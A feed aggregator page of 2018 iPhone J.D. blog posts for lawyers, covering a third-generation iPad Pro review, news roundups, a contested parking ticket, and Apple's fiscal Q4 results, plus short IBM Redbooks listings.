Feed aggregator

Review: iPad Pro 12.9” (third generation) -- the perfect iPad for attorneys

iPhone J.D. - Mon, 11/12/2018 - 01:22

The legal pad dates back to 1888 when Thomas Holley, a paper mill worker, had the idea of binding discarded paper scraps at the mill into inexpensive pads.  In the early 1900s, a Massachusetts judge asked Mr. Holley to add a line 1.25” from the left edge so that the judge had space to annotate his notes, and since that time, the legal pad has been used by countless lawyers.  (For more details, read Old Yeller:  The illustrious history of the yellow legal pad by Suzanne Snider, Legal Affairs, May/June 2005.)

I’ve always thought it obvious that the “pad” in the word “iPad” refers to the legal pad.  After all, the device is sort of like an electronic legal pad, although when the iPad was first introduced in 2010, it was smaller and thicker than a legal pad.  As the screen on the iPad has gotten larger, and as we have gone from an age of third-party styluses which were just so-so to the fantastic first generation Apple Pencil, the iPad has moved closer to a lawyer’s familiar legal pad.  

Apple’s newest iPad Pro, the 12.9” third generation iPad Pro, is the closest that Apple has ever come to an iPad Legal Pad.  The size is almost exactly 8.5” x 11” (letter size), the second generation Apple Pencil is even better than before, and the shape of the device with its flat edges almost feels like a brand new legal pad with crisp edges.  Moreover, the incredibly powerful processor inside combined with the latest iOS and powerful apps makes the latest version of the iPad an incredibly useful tool for lawyers.  Much like the legal pad is an essential tool for any lawyer, the third generation 12.9” iPad Pro is the perfect iPad for many attorneys.  This device is amazing.

The size of a legal pad

One of the reasons that I love using the new iPad Pro is that the screen size remains 12.9” diagonal, just like the first two generations of the iPad Pro, but the overall size has been reduced.  It’s almost like someone figured out a way to take all of the writing space you get with a legal-size legal pad and shrink it down to the less awkward size of a letter-size legal pad. 

Although Apple has reduced the bezels on all sides of the new iPad, and reduced the width a little bit, what you really notice is the decrease in length.  The width only decreased from 8.69” to 8.46”, which is not very noticeable.  But on the longer sides, the length decreased from 12.04” to 11.04”, and that one-inch reduction is noticeable every time I pick up this device.  The depth decreased a little from .27” to .23”, and that is nice, but what you really notice is the difference in shape on the edge.  Instead of being curved and tapered, the edge is now flat, although the corners are rounded so that they don’t hurt your hand.  The end result is that the edge of the new iPad Pro has a feel that reminds me of the iPhone 4 introduced in 2010, although the iPhone 4 was thicker at 0.37”.

Put it all together, and I love the size and shape of this device.  It feels better to hold, and the weight difference between the first generation iPad Pro and this iPad Pro seems more substantial than it really is.  (The weight decreased from 1.57 pounds to 1.39 pounds.)  Here is a new iPad Pro on top of an old iPad Pro:

Maybe it is something about the flat edge being easier to hold that tricks my mind into thinking that this device is even lighter than it was before.  Indeed, while writing this review I've gone back to my older 12.9" iPad Pro to compare the two, and even though I've been using the new iPad Pro less than a week, the older iPad Pro already feels so much bigger when I hold it.  Apple has gone from a 12.9" iPad Pro which was longer than a letter-size legal pad to a 12.9" iPad Pro which is shorter than a letter-size legal pad because it is now the same size as a letter-size piece of paper.

I worked on a project this past Saturday at a coffee house, using my iPad to do online legal research, to read and annotate cases I downloaded, and to draft a memo using a Bluetooth keyboard.  This new size was really nice to use, with a nice big 12.9" diagonal screen in a lighter and easier-to-hold device.  Don’t get me wrong, I’d prefer for the iPad Pro to be even thinner and lighter, like a legal pad.  And I’m sure that it will head in that direction over time, although if it gets much thinner I’m not sure how there will be enough space for a port on the side to plug it in.  But given what is possible with modern technology, I consider this the perfect size for an iPad.

I realize that many folks prefer smaller iPads, and Apple also sells a new 11” iPad Pro, which weighs a half-pound less and is 9.74” x 7.02”.  I played with that model at an Apple Store a few days ago.  It is certainly more compact and lighter when carrying it around, but in my law practice, I am often using my iPad to display documents, and it makes far more sense to me to have something which can show a letter-size document at virtually full size in portrait mode, or in an even larger size in landscape mode. Whether I am writing or editing a document in Microsoft Word, reading an opinion, annotating a brief from my opponent, reviewing exhibits, or reading a transcript, the 12.9” size is fantastic and much better, in my opinion, than a smaller screen.  Carrying around a device which is slightly bigger and heavier is more than worth it for me to have the advantage of the large 12.9” screen.  Even if you previously have been a fan of smaller iPads versus the 12.9” iPad, you owe it to yourself to see if the smaller size of the third generation 12.9” iPad Pro will win you over, even if the first two generations did not. 

As I said in my preview of this new iPad Pro, much like the iPhone X with its edge-to-edge screen seems like the perfect design for the iPhone, the much smaller bezels and reduced size of this new iPad Pro seems like the perfect design for the iPad.  This is the iPad that was always meant to be.  Even if the only new feature of this iPad was the size, that would be enough for me to be a huge fan.

No. 2 Pencil

The second best feature of the new iPad Pro for attorneys is that it works with the new second generation Apple Pencil.  I already loved the tip on the old Apple Pencil, which worked infinitely better than prior third-party styluses thanks to the sharp tip and incredible responsiveness.  But there were a few shortcomings with that first generation Pencil, which led me to wish earlier this year that Apple would open the door to third-party styluses with the same tip, something that Apple did this year for Logitech and its new Crayon stylus, which only works with the 6th generation iPad.

But with the second generation Apple Pencil, Apple has addressed all of the minor complaints I had with the original model.  First, I love that you can now tap the side of the Pencil with your finger to change tools.  For example, last week, I was taking notes in the GoodNotes app while participating in a telephone conference with a judge, and taking notes on my iPad was so much better because if I wanted to change something that I previously wrote, I could just quickly double-tap the side to change to the eraser, erase the word, and then pause a second and GoodNotes automatically switched back to the pen tool.  (Here is more info on how GoodNotes works with the new Apple Pencil.)  Not having to stop what I was doing to find and then tap the eraser tool on the top of the screen may only save about a second or two in actual time, but it made a huge difference in reducing distractions so that my attention remained focused on taking notes of what the judge or the lawyer for the other side was saying.  This one change makes the Pencil vastly more useful for taking notes.  And as app developers come up with additional creative uses for the double-tap (although switching to an eraser is pretty awesome), I’m sure that this feature of the new Pencil will become even better.

One thing to keep in mind:  an app has to be updated to use the double-tap feature with the new Apple Pencil.  For example, GoodNotes works great, but when I double-tap the Pencil in GoodReader, the GoodReader app just ignores that because GoodReader has not been updated (much to my annoyance).

Second, I love that the new Pencil has a flat edge which connects with magnets to the side of the iPad Pro.  It means that I always have a perfect place to put the Pencil when I’m using the iPad but not using the Pencil, and I always know where to reach for the Pencil without hunting around my desk.  I used to keep my Pencil in a shirt pocket using a third-party clip, but that is unnecessary with the second generation Apple Pencil.  When I was doing that online legal research in a coffee shop on Saturday, I kept my Pencil attached to the side as I was searching for cases, and then after I downloaded a case in PDF format, my Pencil was within easy reach, so it was quick and convenient to highlight key language and add notes in the margins.

Because the Pencil charges while it is attached to the edge, my Pencil always has a sufficient charge.  With my first generation Pencil, if I hadn’t used it in many days, it would sometimes be almost dead when I went to use it.  The new Pencil is similar to the fantastic AirPods; when you take the Pencil from the side of your iPad or you take the AirPods out of their case, they are charged and ready to go.

The magnetic connection works well.  As I walk around my office with the Pencil attached to the side, it is incredibly secure and isn’t going to fall off unless I pull it off.  But when I’m ready to use the Pencil, it comes off easily.  I don’t trust keeping the Pencil attached to the side of the iPad Pro when it is in a briefcase or other bag; it seems like something could knock it off, so instead I just put it in a pencil/pen compartment.  But when the iPad Pro is being used, my Pencil is usually either attached to the side or in my hand.

Third, that flat edge on the new Pencil also feels really good in my hand, and combined with the new matte finish keeps the Pencil more secure in my hand when I am writing.  There is a reason that so many pencils and pens have one or more flat edges.  The new Pencil shape is also a little shorter than the prior Pencil.  For me, both lengths are fine, but some folks might prefer one size over the other.

Fourth, good riddance to the cap on the back of the original Pencil that you had to remove to charge the device (and risk losing), and good riddance to having the Pencil protrude like a flagpole from the edge of the iPad when it charged.  There are no removable parts on the new Pencil, and that is as it should be.

Finally, keep in mind that if you order an Apple Pencil from Apple, you can get it engraved for free.  I didn't do that because I was afraid that it would take too long, but I see other folks saying that it didn't add any delay, such as California attorney David Sparks.


Speed

The advances that Apple is making with its A-series processors are the best in the business, and for many years they have been putting companies like Intel to shame.  Tests show that the new iPad Pro is now faster than all but the fastest laptop computers.

Let’s face it:  for most of the tasks that a lawyer will do with an iPad Pro, that speed is more than you need.  Folks running sophisticated games or working with huge images in a photo editor will get the most use out of the new processor, whereas I’m going to notice it less frequently, such as when working with huge PDF files.  But the same can be said for most modern computers; they are capable of speeds that you probably don’t need for everyday tasks like word processing and reading emails.

But what I do notice whenever I use this new iPad Pro is how incredibly responsive it is.  When I am moving between apps, scrolling through screens, swiping through photos, moving my finger down from the top of the screen to see the notification center, etc., everything is as smooth as silk.  This makes a difference because it means that the interface does what I need when I need it, and doesn’t distract me from the task at hand.  I wrote this 3500+ word review using the new iPad Pro and an external keyboard, and I’ve been scrolling up and down this post as I edit it without even a hint of lag.

Finally, the fast A12X Bionic chip means that this iPad Pro is going to remain fast even as iOS is updated over the years and apps become even more power-hungry.


USB-C

Apple has removed the Lightning port and replaced it with industry-standard USB-C.  For now, I’m reserving judgment because I don’t yet have any USB-C devices to test (other than cables), but I have high hopes for this being a great change.

Right now, Apple is touting USB-C as an improvement over Lightning because it allows for faster data transfer and thus can support external 5K displays.  I’m sure that is true, but that is obviously only going to be useful for a small part of the iPad Pro market.  How many of us have a frequent need to use a 4K or 5K monitor with an iPad?  If that was the only advantage, I cannot believe that Apple would have made the change to USB-C.

I think the real reason that Apple made this change is that it has bigger plans for USB-C in the future.  For example, right now, the iPad cannot access files on an external storage device such as a thumb drive or a small hard drive (absent some workarounds using special apps).  My guess is that Apple will add this feature in the future, making it far easier to transfer large files to and from an iPad Pro and share those files with others.

I also suspect that Apple was keenly aware that USB-C is an industry standard, which vastly increases the potential for third parties to come up with accessories.  Just to take one example, I want the ability to connect via HDMI to a projector, something I do whenever I give a Keynote or PowerPoint presentation from my iPad.  In the past, my only option for doing so was Apple’s own $50 Lightning-to-HDMI connector.  But now, I see that there are tons of USB-C-to-HDMI options on the market.  Do I want something with just HDMI for $17, or something with HDMI and VGA for $33, or something with HDMI and an extra USB-C port (for keeping the iPad charged while also connecting to a monitor) such as this one with HDMI and extra USB-C and a USB port for $40, or maybe this big one with 10 connections including HDMI and VGA and Ethernet and more for $56?  All of those devices are already for sale on Amazon, and they were there before the new iPad Pro was even announced.  Companies are currently working to develop even more options designed especially for the iPad Pro, such as Satechi's upcoming Type-C Mobile Pro Hub (pictured below).  USB-C is going to result in far more accessories that can be used with your iPad.

Note that there are some growing pains associated with any transition.  For example, I prefer to back up my iPad to the Mac at my house rather than iCloud, and as I was driving home from work the day that my new iPad Pro arrived, I realized that I had no way to connect the new iPad Pro to my Mac to restore from a backup of the old iPad Pro it was replacing.  I needed a USB-to-USB-C cable, which I didn’t own.  Fortunately, there is an office supply store on the way home and they had tons of those cables for under $10 (because many Android phones use USB-C) so it was cheap and easy to pick one up, but I’m glad that I realized that before I got home.  Similarly, I’ve long had a Lightning cord on my desk in my office which I have used to charge both my iPhone and iPad.  With this new iPad Pro, I now need two cables on my desk:  Lightning for the iPhone and USB-C for the iPad Pro.

As Apple updates iOS to better support USB-C, and as third party companies come out with even more products, I suspect that it won’t be long before USB-C becomes one of the best features for power users of the new iPad Pro.  Perhaps the only downside will be that there will be so many options out there that it will be tough to choose the best ones.

And the rest...

The size/shape, Pencil support, and speed are the main reasons that I have loved using this new iPad Pro since I first received mine last week, but there are lots of other features which are nice but less important for most attorneys.  I listed the other new features in my preview of the new iPad Pro, so look there for all of the details, but just to pick one of them, I really like the screen.  The Liquid Retina display is beautiful with vibrant colors, and it has the same ProMotion and True Tone features that I discussed in my review of the second generation iPad Pro.  The screen on a regular iPad looks just fine, so I find it hard to believe that someone who is not a graphics professional, such as a lawyer, would choose a new iPad Pro just because of the display.  Nevertheless, it is a nice bonus to have this beautiful display along with all of the other more important new features. 


I’m not sure what Thomas Holley would think of the new iPad Pro.  Perhaps he would fear that it would put the company that he founded out of business.  That would have been a valid concern.  He founded American Pad & Paper in 1888 to sell legal pads, and the company eventually changed its name to Ampad and became one of the largest sellers of legal pads and thousands of other office products.  But about 20 years ago, the company was delisted from the New York Stock Exchange and went bankrupt, and what remains of the company is now owned by TOPS Products.  

But as for that judge who asked Mr. Holley to add the line on the left side so that he could annotate documents — I bet you that judge would love the new iPad Pro.  When I am working in my office, this new iPad Pro is a fantastic companion for my computer.  For example, I can review and annotate briefs and exhibits on the iPad while I am writing an appellate brief on my computer based on that brief/exhibit.  When I walk out of my office to go work elsewhere, I can just grab my iPad Pro (and sometimes also grab my external keyboard) and I have everything that I need for a meeting with other attorneys or clients.  The iPad Pro is powerful enough to do most of what I do on a computer, plus it is far better than a computer for so many other tasks like reading and annotating documents, so it often is all that I need.  And then when I return to the computer at my office or at home, I can pick right up with the work that is best done on a computer, with the iPad at my side.  This is all stuff that I’ve been doing for years with an iPad, and it all works better with the new iPad Pro.  Thanks to the iPad Pro, I have almost no need for paper or for legal pads.

For any attorney only planning to use an iPad occasionally, the 6th generation iPad introduced earlier this year might be sufficient for your needs and it is much cheaper.  But whenever you are next in the market for a new iPad (or your first iPad), if you want to have the best iPad experience and are willing to pay over $1,000 for an iPad and accessories that will significantly aid your law practice, this is the perfect iPad to get.  The new 12.9” iPad Pro with its larger screen is a great size and shape, it works with the amazing second generation Apple Pencil, and it is so fast and powerful that the iPad will let you do all that you want to do.  No prior iPad has ever deserved the word “pad” in its name as much as this one.

Categories: iPhone Web Sites

IBM FlashSystem 9100 Product Guide

IBM Redbooks Site - Fri, 11/09/2018 - 08:30
Draft Redpaper, last updated: Fri, 9 Nov 2018

This IBM Redbooks® Product Guide describes IBM FlashSystem® 9100, which is a comprehensive all-flash, NVMe enabled, enterprise storage solution that delivers the full capabilities of IBM FlashCore® technology.

Categories: Technology

In the news

iPhone J.D. - Fri, 11/09/2018 - 00:55

The third-generation iPad Pro is now available, and most of the news of note this week relates to this new product.  I received mine on Wednesday, and this is a remarkable device.  I want to use it a little more before I write a review, but so far it is amazing.  And now, here is that news of note from the past week:

  • If you are starting to plan your CLE hours for 2019, ABA TECHSHOW will take place in Chicago February 27 to March 2, 2019 at the Hyatt Regency Chicago, and registration is now open.  I plan to be there.
  • Attorney Nilay Patel reviews the new iPad Pro for The Verge.  Although he states that "Apple once again produced mobile hardware that puts the rest of the industry to shame when it comes to performance, battery life, and design," he doesn't like that the iPad Pro cannot replace a computer.  I think that misses the point — the iPad Pro is perfect for the tasks that are best suited for a tablet, whereas a computer is best suited for the tasks that are best suited for a computer, even though there are areas of overlap.
  • Raymond Wong of Mashable wrote an excellent review of the new iPad Pro.
  • John Gruber of Daring Fireball also wrote an excellent review of the new iPad Pro.
  • Matthew Panzarino of TechCrunch also wrote an excellent review of the new iPad Pro.
  • In an article for Macworld, Jason Snell discusses the extensive use of magnets in Apple's products, such as in the new iPad Pro.  Like Jason, I very much remember the old days of computing in which magnets were a big problem around computers, especially if one got close to a floppy disk.
  • Charlie Sorrel of Cult of Mac shows that there are enough magnets on the back of the new iPad Pro to stick it to a refrigerator.  I cannot emphasize enough that THIS IS A BAD IDEA but it is sort of funny.
  • In an interview with David Phelan of The Independent, Apple's Jony Ive discusses the design of the new iPad Pro.
  • Joe Rossignol of MacRumors reveals three lesser-known things about the second-generation Apple Pencil, including a description of the way that it updates its firmware.  And apparently there is already a released firmware update.
  • Samuel Axon of Ars Technica interviewed Apple's Anand Shimpi and Phil Schiller to discuss the incredibly fast processor in the new iPad Pro.
  • Benjamin Mayo of 9to5Mac wrote a useful article on some of the accessories that can connect to the USB-C port on the new iPad Pro.
  • Christine McKee of AppleInsider reports that the top selling item at Best Buy in October was Apple's AirPods.
  • And finally, Twelve South introduced an interesting new product this week called PowerPic.  It looks like a normal picture frame, and you can place any 5x7 photo behind the glass.  But if you set your iPhone in the frame, the built-in Qi charger will charge your iPhone.  It's an interesting way to put an iPhone charger in a room without it looking like an iPhone charger.  It costs $79.99 on Amazon.  Here is a 20-second video which shows how it works:

Categories: iPhone Web Sites

Best Practices Guide for Databases on IBM FlashSystem

IBM Redbooks Site - Thu, 11/08/2018 - 08:30
Draft Redpaper, last updated: Thu, 8 Nov 2018

Best Practices Guide for Databases on IBM FlashSystem

Categories: Technology

Challenging a parking ticket with the ParkMobile app

iPhone J.D. - Tue, 11/06/2018 - 22:44

I fought the law, and my app won.  Here is my story.

For many years now, there have been systems in place in many cities allowing you to pay for a parking spot using an iPhone app.  I live in New Orleans, and the system that we use here is called ParkMobile, which operates in 350 cities in the United States.  It is convenient that you can pay for a parking spot before you even leave your car, it is helpful to see how much time you have on the meter even when you are far away from your car, and perhaps best of all, you can add more time to the parking meter no matter where you are.  There have been multiple times when I have been in a deposition or a meeting which ran long and I was able to quickly add more time to the meter without having to go all the way back to my car.  The system works so well that it has almost seemed too easy, making me wonder if simply using the app really would protect me from getting a parking ticket.

On September 25, 2018, I met my wife for lunch at a great restaurant called The Rum House on Magazine Street (a street with tons of fantastic restaurants and shops) and I parked between Seventh and Eighth Streets, right in front of a place called Sucré — which, by the way, makes amazing chocolates, macarons, and other sweets which are available for mail order.  I used the ParkMobile app to pay for parking for 46 minutes ($1.55 plus a $0.35 transaction fee), knowing that if I needed more time than that I could add it from the restaurant.  When lunch was over, it was raining, but I got back to my car with about three minutes left on my parking.  I jumped in the car, turned on the windshield wipers, and then saw underneath a wiper an orange parking ticket envelope with a ticket inside.  Ugh!


I opened up the ParkMobile app, and I saw that I still had about a minute left before my parking would expire.  So I took a screenshot, just in case that might help down the road.

In retrospect, what I wish I had also done was get out of the car and take a picture of my car and the surroundings to show where I was parked (even though I would have gotten pretty wet doing so in the rain), but at the time I didn't realize that would become relevant.  I did, however, take a screenshot of the part of the ParkMobile app that shows that I paid to park in that zone during that time period.  (The black box is where I redacted my vehicle license for this post.)


After I returned to my office, I took a closer look at the ticket and figured out what happened.  The ticket was issued at 12:50 p.m., which was during my paid parking time of 12:22 to 1:08 p.m., so that wasn't the problem.  However, the officer who issued the ticket apparently checked whether I had paid using the ParkMobile app but thought by mistake that I was parked in the 2900 block of Magazine Street, which is parking zone 29216.  In fact, I was parked in the 3000 block of Magazine Street, which is zone 29217. 

New Orleans has a system which allows you to contest a ticket online rather than show up in court.  I had never used the system before, but it was pretty easy to use.  You just fill out a form, explain what happened, and upload any exhibits you want to submit.  I sent the above screenshot pictures, and I also took a screenshot of a part of the ParkMobile website further confirming that I paid.  Unfortunately, I didn't have proof that I was parked in the 3000 block — again, I wish I had taken a picture — but I figured that even if the judge didn't believe me on where I parked, it might help if the judge could see that I had indeed paid to park during the time period that I got the ticket.

After I contested my ticket online, I received an email saying that I would get a decision within five weeks.

Almost exactly five weeks later, I received a letter in the mail saying that I was successful in contesting the ticket.  The decision states:  "Citizen's written statement and citizen's and City's Park Mobile Meter Program information outweighed the prima facie case."

It's always satisfying to get a favorable decision for one of my clients, especially when a lot of money is at stake.  Here, the amount in controversy was only a $30 parking ticket, but it still felt pretty darn good to win.

If you ever get a parking ticket after you have used a parking app, perhaps you will remember my tremendous victory using evidence from the ParkMobile app and you will do some of the same things that I did.  But if you can, also try to take a picture of where your car was located.

Categories: iPhone Web Sites

Apple 2018 fiscal fourth quarter -- the iPhone and iPad angle

iPhone J.D. - Sat, 11/03/2018 - 23:56

Late Thursday, Apple released the results for its 2018 fiscal fourth quarter (which ran from July 1, 2018 to September 29, 2018) and held a call with analysts to discuss the results.  I've been reporting on these quarterly calls for 10 years because even though the calls are aimed at financial analysts, the Apple executives would sometimes reveal something interesting about the iPhone and iPad, and also because Apple would reveal how many iPhones and iPads were sold in the last quarter.  However, that is now about to change.  Although Apple revealed iPhone and iPad sales numbers for last quarter, Apple announced that starting with the fiscal 2019 first quarter (which we are in now), Apple will no longer reveal iPhone and iPad unit sales.  I cannot say that I'm surprised; none of Apple's competitors release similar numbers, and while I am not a securities lawyer, I think that as a public company all that Apple is required to reveal is certain financial information such as profits.  Even so, it has been interesting to look at the data on iPhone and iPad sales over the last decade.

Apple's fiscal fourth quarter is typically a transitional quarter; it is Apple's fiscal first quarter which contains all of the holiday sales, so that is by far Apple's best quarter every year.  Even so, Apple announced that quarterly revenue for the past quarter was $62.9 billion, which is the best fiscal fourth quarter in Apple history.  $10 billion of that was revenue on services, and that is also an all-time high for Apple.  If you want to get all of the nitty gritty details, you can download the audio from the announcement conference call from iTunes, or you can read a transcript of the call prepared by Seeking Alpha, or a transcript prepared by Jason Snell of Six Colors.  Apple's official press release is here.  Here are the items that stood out to me.


  • During the past quarter, Apple sold 46.9 million iPhones, just slightly more than the 46.7 million iPhones sold in Apple's 2017 fiscal fourth quarter.  The all-time record for iPhone sales in a fiscal Q4 was in 2015, when Apple sold 48 million iPhones.
  • While the increase in the number of iPhones sold versus 2017 Q4 was modest, the increase in revenue from iPhone sales was more impressive thanks to sales of the iPhone X and the first few weeks of sales of the iPhone XS and iPhone XS Max.  iPhone revenue was $28.8 billion in 2017 Q4, and it rose to $37.2 billion in 2018 Q4, a 29% increase.  Considering that unit sales did not go up very much, that demonstrates that people are now buying more expensive iPhones.
  • By my count, Apple has sold 1.468 billion iPhones since they first went on sale in 2007.  And because Apple will no longer report these numbers every quarter, this is the last time I'll be able to report a precise number of all-time iPhone sales.



  • Apple sold 9.7 million iPads in the fiscal fourth quarter.  That's not as impressive as many other recent quarters, but the introduction of the new iPad Pro last week may start to change that.
  • By my count, Apple has sold almost 425 million iPads since they first went on sale in 2010.
  • If you add all of the iPhone and iPad sales over time, it comes to about 1.892 billion devices sold.  If you add in all of the sales of the iPod touch over time, another device that runs iOS, Tim Cook announced last week that Apple has sold over 2 billion devices that run iOS.
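Since Apple will no longer report unit sales, the running totals above are worth a quick arithmetic check.  Here is a small sketch (in Python, using the post's approximate figures; the "almost 425 million" iPad total is rounded to 424 million) confirming the 29% iPhone revenue increase and the roughly 1.892 billion combined devices:

```python
# Sanity-check the figures quoted in the bullets above.

# iPhone revenue: $28.8 billion (2017 fiscal Q4) vs. $37.2 billion (2018 fiscal Q4)
rev_2017_q4 = 28.8  # billions of dollars
rev_2018_q4 = 37.2
pct_increase = (rev_2018_q4 / rev_2017_q4 - 1) * 100
print(f"iPhone revenue growth: {pct_increase:.0f}%")  # 29%

# Cumulative unit sales (approximate figures from the post)
iphones_sold = 1.468e9  # iPhones sold since 2007
ipads_sold = 0.424e9    # "almost 425 million" iPads sold since 2010
combined = (iphones_sold + ipads_sold) / 1e9
print(f"Combined iPhone + iPad sales: about {combined:.3f} billion")  # about 1.892 billion
```

Adding the iPod touch on top of that combined total is what gets Apple past the "over 2 billion iOS devices" figure that Tim Cook cited.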


  • Tim Cook announced that Apple Pay use has tripled since this time last year.
  • Cook also noted that Consumer Reports named Apple Pay Cash the highest-rated mobile peer-to-peer service, based on exceptional payment authentication and data privacy.
  • Cook said that it was a record quarter for revenue from wearable products, including the Apple Watch, AirPods and Beats headphones.
  • Apple now has about 500 Apple Stores, and almost half of those are outside of the United States.
  • Cook noted that healthcare is an area in which Apple has a lot of interest.  "You can see from our past several years that we have intense interest in the space and are adding products and services — not monetized services, so far — to that, and I don’t want to talk about the future, it’s because I don’t want to give away what we’re doing. But this is an area of major interest to us."
Categories: iPhone Web Sites

In the news

iPhone J.D. - Fri, 11/02/2018 - 01:51

When I was younger, taking a photograph meant using film in a camera.  You only had so many pictures on a roll, and you had to pay to develop every picture (even the bad ones), so you were more circumspect about pressing that shutter button.  Nowadays, you can take virtually unlimited pictures for free with your iPhone.  That's great, but it also means that you end up with tons of pictures, only some of which are worth keeping.  This week, California attorney David Sparks of MacSparky reviews BestPhotos, an iPhone app that helps you to pick out the photos on your iPhone that are worth keeping.  The app even gives you options to quickly delete obvious errors.  For example, the app can quickly find all of the videos on your iPhone that last about one second because those are videos that you likely took by accident when you intended to take a photo but instead you were in video mode.  Just tap the mistakes and then tap one button to delete them all.  You can also quickly add missing location information to a bunch of photos at one time, view photos side-by-side to quickly select the one worth keeping, view all of the metadata associated with a picture, and much more.  I was thrilled to learn about the BestPhotos app (developer website) from David Sparks and I quickly paid the $3 to unlock all of the features.  And now, the news of note from the past week:

  • Illinois attorney John Voorhees of MacStories writes about some of the interesting details of Apple's October 30th announcements that you may have missed.
  • California attorney Jeffrey Allen recommends iPhone apps for road warriors in an article for the ABA GPSolo Magazine.
  • I've written before (1, 2) about how border patrol agents will sometimes demand the right to search your iPhone as you come into the United States, and if you decline to unlock your iPhone and let them do so, they may seize the device.  Two months ago this happened to an American Muslim woman, and she retained an attorney with the Council on American-Islamic Relations to represent her in a lawsuit against the government.  Cyrus Farivar of Ars Technica reported this week that the case settled and that the government returned her iPhone.
  • It sounds like a scene from a techno horror movie — a bunch of Apple Watches in a hospital shut down, and then a bunch of iPhones shut down, but other cellphones and electronic devices continue to work just fine.  What in the world could cause that?  Kyle Wiens of iFixIt reports that it turns out that there was a helium leak from an MRI machine which impacted the clocks on Apple devices, and when the clock stops working, the rest of the device cannot work so it shuts down.  It's an interesting story.
  • If you use the Microsoft Outlook app on your iPhone, Michael Potuck of 9to5Mac reports that a new update provides better support for the larger screens on an iPhone XS Max and an iPhone XR.
  • Jeremy Burge of Emojipedia shows off all of the new emoji and emoji changes introduced in iOS 12.1, which came out earlier this week.  He counts 158 new emojis.
  • In January of 2017, Apple introduced a new power management feature for the iPhone 7 and earlier models to help to prevent a device from unexpectedly shutting down when the battery in the device gets old.  Joe Rossignol of MacRumors reports that iOS 12.1 adds this feature to the iPhone 8 and iPhone X.
  • Rossignol also reports that initial tests show that the new iPad Pro is as fast as a new MacBook Pro.  Wow.
  • Charlie Sorrel of Cult of Mac discusses the USB-C port on the new iPad Pro.
  • M.G. Siegler reviews the Apple Watch Series 4 in a post on Medium.  He believes that this is the first truly great Apple Watch, and I agree.
  • Brent Dirks of AppAdvice reviews Name Skillz, a $5 app which helps you to remember people's names.
  • And finally, Apple released two videos this week which show off the new features in the iPad Pro.  A one-minute video called Change focuses on what is different, like the larger screen.  The more informative one is a three-minute introduction video, and that is the one I have embedded below:

Categories: iPhone Web Sites

Why lawyers will love the new iPad Pro (2018 editions: 12.9" 3rd Generation and 11")

iPhone J.D. - Wed, 10/31/2018 - 02:14

Yesterday, Apple held an event in Brooklyn, NY to unveil the new 2018 version of the iPad Pro.  The iPad Pro was already incredibly useful for attorneys, and this new version is a major upgrade.  Apple has essentially taken everything that was good about the iPhone X / XS / XR and applied it to the iPad, and then on top of that greatly improved the Apple Pencil.  This looks to be a fantastic new device, and I ordered one immediately.

More screen, less bezel

The iPhone X with its edge-to-edge screen and no home button was an obvious design change from all prior iPhones, and the same can be said about the new iPad Pro.  For the first time ever on an iPad, Apple has removed the home button and Touch ID and replaced it with Face ID, and then greatly reduced the size of the bezel around the iPad.  As a result, the new iPad Pro looks like it is essentially all screen.  When introducing the new iPad Pro, here is what Apple VP of Engineering John Ternus said:  "It marks the biggest change since the original iPad, and we have made it better in every possible way.  In fact, this really is the iPad we dreamed about building from the very beginning.  We've always felt that the iPad should be all about the display.  And in this new iPad Pro, we have an LCD which stretches from edge to edge and top to bottom."  He could have just as easily been talking about the iPhone X being what Apple always wanted the iPhone to be.

Apple was very smart in making this change because it took a different approach for each of the two iPad Pro sizes.  Let's start with the smaller model.  The original iPad Pro came out in 2015 and it was 12.9".  In 2016, Apple introduced a smaller 9.7" iPad Pro with the familiar 9.4" x 6.67" size.  In 2017, Apple took the original 9.7" iPad Pro and made the bezels smaller (but kept the Home Button) to produce a 10.5" iPad Pro which had a larger screen but approximately the same overall size as the prior iPad Pro:  9.8" x 6.8".  This year, Apple has again kept the overall dimensions about the same (9.7" x 7") but reduced the bezels further and removed the Home Button, resulting in a new 11" diagonal screen.  Apple made the right choice here.  People have loved this size of iPad ever since the first iPad came out in 2010, but now there is more screen to use in essentially the same overall size.

For the larger model, Apple knows that folks love that larger screen.  You can look at letter-sized documents essentially full-size when you are in portrait mode, and whether I am annotating briefs, reviewing exhibits, or even just surfing the web, the larger 12.9" screen helps me to be incredibly productive in my law practice.  But the 12.9" iPad Pro has always been large and somewhat cumbersome.  After using one since 2015 I've gotten used to it, but I always wished that there was some way to get that fantastic, larger screen in a smaller device.  And that's exactly what Apple has done.  Apple has kept the screen size at 12.9" but reduced the bezels around it.  As a result, unlike the prior versions of the 12.9" iPad Pro, which were around 12" x 8.9", the new 12.9" iPad Pro is about 11" x 8.5".  In other words, unlike prior models where just the screen was about the size of a letter-sized sheet of paper, now the entire iPad is about the same size as a letter-sized sheet of paper.  Moreover, the depth decreases from .27" to .23", and Apple also rounded off the corners.  Overall, Apple says that the 2018 version of the 12.9" iPad Pro has 25% less volume than its predecessor, an incredibly impressive change.
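Apple's "25% less volume" figure can be checked against the approximate dimensions above (a back-of-the-envelope calculation, using the rounded measurements from this post):

```javascript
// Rough volume comparison of the two 12.9" iPad Pro generations,
// using the approximate dimensions above (inches).
const oldVolume = 12 * 8.9 * 0.27;   // prior 12.9" iPad Pro
const newVolume = 11 * 8.5 * 0.23;   // 2018 12.9" iPad Pro
const reductionPct = Math.round((1 - newVolume / oldVolume) * 100);
console.log(reductionPct + "% less volume");  // 25% less volume
```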

Because there is no button on the new iPad Pro, you use the same gestures you use on an iPhone X, such as a swipe up to return to the home screen, and a swipe along the bottom to switch between apps.

If the only new feature of this iPad Pro had been this change in size, that would have been enough for me to be incredibly excited. Having the same large screen to get all of my work done in a device which is smaller and easier to carry around from office to office within my firm, and to court, is going to be fantastic.  I cannot wait to start using it when mine is delivered next week.

No. 2 Pencil

I've been using an Apple Pencil with my iPad Pro since 2015, and I use the Pencil almost every day.  When I am reviewing a brief from an opponent, I use the Pencil to circle arguments and scribble my responses in the margins.  When I am reviewing caselaw I downloaded from Westlaw or Lexis, I use my Pencil to highlight key passages and write the key holding on the first page of the case.  When I am reviewing an exhibit, I highlight and markup key parts.  I use the GoodNotes app to take handwritten notes in meetings and in court and to draft oral arguments.  The iPad Pro is an incredibly useful device, and the Apple Pencil brings it to the next level.

As much as I have loved the Pencil, I have yearned for new features.  With the second generation Apple Pencil, Apple has now added all of the features I had been wishing for.

